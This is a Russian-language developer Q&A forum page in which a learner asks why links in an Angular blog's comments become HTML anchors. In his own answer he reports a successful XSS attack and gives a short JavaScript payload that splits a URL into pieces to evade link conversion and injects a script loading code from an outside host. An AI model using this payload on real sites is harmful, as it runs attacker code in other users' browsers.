BruTO8000
@BruTO8000
Пытаюсь научиться разработке

Все ссылки введенные в комментарии превращаются в элемент. Как оставить в виде текста?

Есть приложение которое работает на angular. Что-то типа блога. Если в комментарии ввести<script> и какой-то код, то он выполняется. Но если ввести какую-то ссылку, типа google.com, то она превратится в <a href="http://google.com">google.com</a>. Как оставить все в виде текста?
  • Вопрос задан
  • 108 просмотров
Решения вопроса 1
BruTO8000
@BruTO8000 Автор вопроса
Пытаюсь научиться разработке
Даниил, Успешно провел XSS атаку)
Дело в том, что только при загрузке проверяется текст, и ссылки превращаются в элементы. Да еще и только в переделах 1 div. Просто создал переменную, куда по частям положил ссылку.
setTimeout(function(){   
     var my_awesome_script = document.createElement('script');
let a = "";
a = "http" + ":" + "//" +"somesite."+ "ru"+"/someURN";
my_awesome_script.setAttribute('src',a);
document.head.appendChild(my_awesome_script);}, 2000)
Ответ написан
Пригласить эксперта
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы